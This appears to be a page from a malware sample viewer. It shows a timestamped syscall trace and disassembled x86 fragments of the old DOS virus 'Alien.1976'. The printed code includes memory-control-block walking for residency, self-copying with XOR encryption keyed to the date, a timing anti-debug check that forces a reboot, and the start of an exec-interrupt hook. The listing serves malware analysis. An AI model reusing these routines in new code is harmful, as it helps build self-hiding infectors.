Sample viewer

vx.netlux.org/Virus.DOS.Alien.1976

.

GIF

Syscalls:

Time Syscall Op Syscall Name
2018-12-17T23:02:01.993230229Z 128 PC: 13a59 | UNKNOWN!
2018-12-17T23:02:01.995084414Z 44 PC: 13a95 | Get time 0x13a95: mov byte ptr [0x26], ch
0x13a99: mov byte ptr [0x27], cl
0x13a9d: mov byte ptr [0x28], dh
0x13aa1: mov bx, word ptr [0x22]
0x13aa5: add bx, bx
0x13aa7: push es
0x13aa8: mov ax, es
0x13aaa: dec ax
0x13aab: mov es, ax
0x13aad: cmp byte ptr es:[0], 0x5a
0x13ab3: je 0x13ac2
0x13ab5: mov ax, word ptr es:[3]
0x13ab9: mov cx, es
0x13abb: add ax, cx
0x13abd: inc ax
0x13abe: mov es, ax
0x13ac0: jmp 0x13aad
0x13ac2: mov ax, word ptr es:[1]
0x13ac6: cmp ax, 0
0x13ac9: je 0x13ae4
2018-12-17T23:02:01.997780963Z 42 PC: 13b39 | Get date 0x13b39: mov byte ptr [0x1d], dl
0x13b3d: cld
0x13b3e: mov cx, word ptr [0x20]
0x13b42: mov si, 0
0x13b45: mov di, 0
0x13b48: rep movsb byte ptr es:[di], byte ptr [si]
0x13b4a: mov si, 0
0x13b4d: mov cx, word ptr [0x20]
0x13b51: rep movsb byte ptr es:[di], byte ptr [si]
0x13b53: mov cx, word ptr [0x20]
0x13b57: mov di, cx
0x13b59: mov si, 0x74
0x13b5c: add di, si
0x13b5e: sub cx, si
0x13b60: sub cx, 4
0x13b63: xor byte ptr es:[di], dl
0x13b66: inc di
0x13b67: loop 0x13b63
0x13b69: ret
0x13b6a: sub ax, ax
2018-12-17T23:02:02.000654824Z 44 PC: 13b8d | Get time 0x13b8d: sub ch, byte ptr [0x26]
0x13b91: cmp ch, 0
0x13b94: jne 0x13ba9
0x13b96: sub cl, byte ptr [0x27]
0x13b9a: cmp cl, 0
0x13b9d: jne 0x13ba9
0x13b9f: sub dh, byte ptr [0x28]
0x13ba3: cmp dh, 2
0x13ba6: ja 0x13ba9
0x13ba8: ret
0x13ba9: ljmp 0xf000:0xfff0
0x13bae: ret
0x13baf: sti
0x13bb0: cmp ax, 0x8040
0x13bb3: je 0x13bb8
0x13bb5: jmp 0x13bbc
0x13bb7: nop
0x13bb8: mov ax, 0x2010
0x13bbb: iret
0x13bbc: cmp ax, 0x4b00